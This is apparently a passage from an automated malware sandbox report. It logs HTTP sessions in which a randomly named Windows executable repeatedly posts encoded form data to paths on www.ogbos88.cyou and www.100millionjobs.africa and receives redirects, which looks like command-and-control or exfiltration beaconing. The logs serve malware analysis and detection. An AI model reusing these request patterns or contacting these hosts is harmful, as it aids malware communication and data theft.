                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:37.221043110 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.11.3049849172.67.132.227805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:42.542651892 CET799OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 42 4d 77 73 35 6d 77 32 4b 69 5a 37 62 45 42 6a 78 4a 4e 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZBMws5mw2KiZ7bEBjxJNvQ==
                                                                                    Jan 9, 2025 16:55:42.695679903 CET800INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:42 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:42 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2KfUyvrYwELNR1kT60VeD1eP1O0YiGTZL58yfIZ3Az8f4e6MdeBqrh6w3vKAcXfgxJX8vC9vKQh89apecGX8xnZg44ezvn69WtzKuVFT1XoYW%2BRWwG5JP9d64ZX4iYmfbYCA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59cf74907e248-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.11.3049850172.67.132.227805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:45.201143026 CET819OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 65 47 31 2f 30 53 4c 47 48 4b 67 39 2b 78 4c 64 46 64 37 6b 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3eG1/0SLGHKg9+xLdFd7k=
                                                                                    Jan 9, 2025 16:55:45.402821064 CET800INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:45 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:45 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DW9aceb4%2BrpOeoKIEL26iLQmzZoAIuK5Bms8XOXuKG81xAy08fjgx0IjZi2Zv4BI6kX3RaqwUBYfPSdsTGeeP2Zrl72YFa3Jpai38Yt2dDaoBC4C5ZEq9tLXgyDJextBMZhx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d07ebd210bb-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.11.3049851172.67.132.227805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:47.856874943 CET1289OUTPOST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 44 6d 48 73 6e 4c 34 6c 33 48 53 30 52 37 46 33 35 58 63 53 55 37 66 55 4a 45 5a 75 59 71 44 78 42 54 77 61 58 34 72 70 36 47 4d 35 6f 47 68 6c 49 31 55 6d 6c 59 39 73 51 72 41 58 54 72 57 45 70 4b 35 4f 6e 31 62 6b 35 68 53 4d 73 33 7a 4a 41 51 69 76 41 4e 4a 73 51 68 51 79 64 63 6d 35 37 58 53 68 7a 33 4d 37 30 65 37 79 32 56 4a 70 59 76 42 4d 2f 70 30 47 36 62 5a 59 46 4c 45 31 37 73 61 44 73 44 58 5a 38 44 38 4e 47 47 5a 42 76 43 6b 77 6f 49 39 78 38 4d 6b 46 6b 35 56 4f 33 30 4e 33 5a 6c 43 7a 4e 42 67 4d 72 47 68 38 35 74 57 51 38 53 50 6a 43 67 66 51 50 38 75 59 35 6d [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj5DmHsnL4l3HS0R7F35XcSU7fUJEZuYqDxBTwaX4rp6GM5oGhlI1UmlY9sQrAXTrWEpK5On1bk5hSMs3zJAQivANJsQhQydcm57XShz3M70e7y2VJpYvBM/p0G6bZYFLE17saDsDXZ8D8NGGZBvCkwoI9x8MkFk5VO30N3ZlCzNBgMrGh85tWQ8SPjCgfQP8uY5mKx19A4aV2kQNFygbqY6Nenmn9LMeUkq1SX1pyBYELdeAHjKuudTwXQly7qej7NTBAxTT0601ykFobqbQFMi+RjZcVbNG+iA7/lm8oHpEtM5qAtaU8jjXY6jscQXlzqvVY0ud0rNFfBRT1zdJCM04oIjBnROixhF2w8TDdCP2Cub4aJznTev+tFCP0A3Z9XAJUvIOOXfuxIGGmV8YRADxypiHmixP8hQcV1vCcfo175gzSzb6U5gpaCUTvl9pVH+KEIie5+RXJ0MizIF18qiN8i68PuIMk4SPjDxHJlYAnaHBbM5zuswp03c+mqAhlBQGWchFfnzh9gLYuSMrPAXcX2pC2bcFBZtnLA
                                                                                    Jan 9, 2025 16:55:47.856925011 CET2647OUTData Raw: 39 6a 49 77 77 46 46 52 75 4d 71 2f 47 71 51 4c 33 2f 75 54 42 45 4b 6a 48 6d 62 67 72 6d 47 2f 50 43 47 71 36 30 32 43 63 37 4a 67 47 7a 50 32 6b 4c 38 78 4f 41 32 62 33 48 2f 30 6b 7a 47 52 45 4c 77 55 45 30 53 41 59 49 4e 76 70 41 31 33 55 6e
                                                                                    Data Ascii: 9jIwwFFRuMq/GqQL3/uTBEKjHmbgrmG/PCGq602Cc7JgGzP2kL8xOA2b3H/0kzGRELwUE0SAYINvpA13Un9dksgP70+cdjAva0fqPzQUI+VC/J2QeWGrOllVfV563WZ8vKq8O02KBVU6Gxuf4513UfHdp2xJu+CjimJ8bshOkFkRkZEv/XXiij/WHBedO2MQpqykIDMwvmO3p9cKuleFHbtts8uVny+f4FGvUSOgAtWOngYc0ki
                                                                                    Jan 9, 2025 16:55:47.994868040 CET810INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:47 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ewfl4ORWwRW7Rg1MJHG48ei6sQ152y1%2B32GgmIEeK%2Bah3MRFNeeCxfTi6HlYxFrJ70UTkjYLvcUZT131yQl9BoL3hNo%2FOE02Q2%2BhJgTd%2FHGsm9Kk6u8uwgretzGgmO%2FgmOzW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d1888ed1407-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.11.3049852172.67.132.227805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:50.507252932 CET535OUTGET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:50.646014929 CET781INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:50 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:50 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPWwRjxDLE%2FXGi0MQJtrqvjOc1h2KWtNzBh80EQNY831F9Q4k4l2S8eDF3vTQgiZfJvv6AkfDYJXy1tj6xvNNlf3WCOk82FYEAF2uMnhMO%2BSB2ScCxpd7D%2BYtBxkBVqwII4n"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d291a7a022a-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.11.3049853136.243.64.147805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:04.669420958 CET826OUTPOST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6d 48 49 50 47 61 64 4b 6c 5a 43 61 64 66 66 59 33 65 6a 5a 41 2b 67 77 48 76 76 4f 6d 49 45 75 54 35 4e 41 46 59 54 31 66 65 39 32 4c 6f 79 2f 51 58 65 70 6f 7a 51 73 72 4f 33 42 7a 77 70 73 79 62 45 31 7a 76 2f 76 71 67 55 2b 44 7a 56 38 49 37 45 76 35 45 50 4c 4c 4d 76 47 54 51 46 31 6c 61 61 43 34 44 76 50 35 45 62 4d 4c 6b 79 51 6d 43 58 4d 6b 63 52 33 2f 31 38 55 73 2f 2b 48 54 39 64 66 45 55 50 71 43 32 6f 53 72 4a 73 2b 47 31 6c 41 54 6f 51 48 68 49 55 34 59 78 32 38 76 4d 43 4a 75 49 31 58 51 76 4a 72 54 5a 65 70 67 36 79 6d 6b 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vMCJuI1XQvJrTZepg6ymkA==
                                                                                    Jan 9, 2025 16:56:04.898854971 CET493INHTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:04 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.11.3049854136.243.64.147805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:07.436496019 CET846OUTPOST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 55 75 57 72 56 41 47 64 2f 31 65 65 39 32 45 49 79 36 55 58 65 79 6f 7a 63 53 72 50 4c 42 7a 78 4e 73 79 65 34 31 7a 59 54 6f 71 77 55 38 43 44 56 36 48 62 45 76 35 45 50 4c 4c 49 4f 68 54 51 74 31 6c 75 6d 43 70 52 58 51 36 45 62 44 63 55 79 51 78 53 57 4c 6b 63 52 46 2f 33 45 36 73 39 32 48 54 2b 4a 66 45 46 50 70 56 47 6f 49 6b 70 74 48 41 6c 6b 4f 63 4a 5a 77 77 34 30 6c 66 53 50 49 6e 37 76 54 7a 4c 42 56 44 50 31 47 50 59 7a 42 69 34 7a 39 35 48 79 7a 66 69 44 2b 36 51 5a 6f 58 6e 68 6b 44 71 47 4e 73 41 6f 3d
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyzfiD+6QZoXnhkDqGNsAo=
                                                                                    Jan 9, 2025 16:56:07.660809994 CET493INHTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:07 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


